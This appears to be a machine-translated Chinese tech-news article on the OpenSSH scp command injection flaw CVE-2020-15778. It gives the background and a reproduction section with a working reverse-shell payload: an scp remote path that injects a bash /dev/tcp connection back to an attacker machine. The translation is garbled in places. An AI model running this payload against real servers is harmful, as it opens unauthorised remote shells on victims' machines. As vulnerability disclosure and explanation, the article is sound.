Shulou(Shulou.com)05/31 Report--

This article is to share with you about the OpenSSH command injection vulnerability CVE-2020-15778 how to understand, the editor feels very practical, so share with you to learn, I hope you can get something after reading this article, say no more, follow the editor to have a look.

1. Summary of vulnerabilities

Researcher Chinmay Pandya discovered a loophole in Openssh on June 9, 2020, which was made public on July 18, 2020. Scp in OpenSSH's 8.3p1 allows commands to be injected into the scp.c remote function, which can be exploited by an attacker to execute arbitrary commands. At present, most linux systems are affected. We are convinced that the security research team assesses and notifies vulnerabilities based on their importance and impact.

Second, loophole analysis

2.1 OpenSSH introduction

OpenSSH is an open source implementation for remote login using the SSH protocol. Prevent eavesdropping, connection hijacking and other attacks by encrypting interactive traffic. OpenSSH is developed by some developers on the OpenBSD project, is provided under a BSD-style license, and has been integrated into many commercial products.

2.2 vulnerability description

Researcher Chinmay Pandya found a command injection vulnerability in the scp component of openssh. Scp in OpenSSH's 8.3p1 allows commands to be injected into the scp.c remote function, which can be exploited by an attacker to execute arbitrary commands. At present, most linux systems are affected.

2.2.1 introduction to the scp command

Scp is the abbreviation of secure copy. In linux system, scp is used to copy files and directories between linux, and to carry out secure remote file copy commands based on ssh login. This command is implemented by scp.c of openssh and other related code.

2.2.2 vulnerability recurrence

Command injection caused by scp command

Bounce payload of shell

Scp 1.txt cracer@ injured machine ip:' `bash-I > & / dev/tcp/ attack machine ip/4444 0 > & 1` / tmp/test.txt'

Field test, this machine is used for testing.

1. Check the ssh version, which is consistent with the vulnerable version.

Ssh-V

2. Create a new file locally for uploading

3. Enable monitoring locally

3. Use scp command to inject successfully rebounded shell

The above is how to understand the OpenSSH command injection vulnerability CVE-2020-15778. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.